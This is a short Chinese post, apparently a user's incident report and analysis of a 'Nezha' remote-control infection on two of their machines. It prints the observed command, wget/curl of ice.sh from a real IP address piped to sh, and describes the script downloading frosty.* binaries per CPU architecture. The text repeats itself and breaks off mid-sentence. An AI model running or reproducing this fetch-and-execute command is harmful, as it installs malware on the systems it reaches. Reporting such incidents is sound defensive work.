[NS :
今天看见消息已经晚了,有两台机器已经中毒。具体迹象为ezha-agent触发下载sh-c(wget-O- http://86.54.82.179/ice.sh ||curl-sL http://86.54.82.179/ice.sh )|sh这个脚本会它会切到常见可写目录,按多种CPU架构循环下载frosty.*二进制,然
nega] 哪吒远控病毒分析今天看见消息已经晚了,有两台机器已经中毒。具体迹象为ezha-agent触发下载sh-c(wget-O- http://86.54.82.179/ice.sh ||curl-sL http://86.54.82.179/ice.sh )|sh这个脚本会它会切到常见可写目录,按多种CPU架构循环下载frosty.*二进制,然
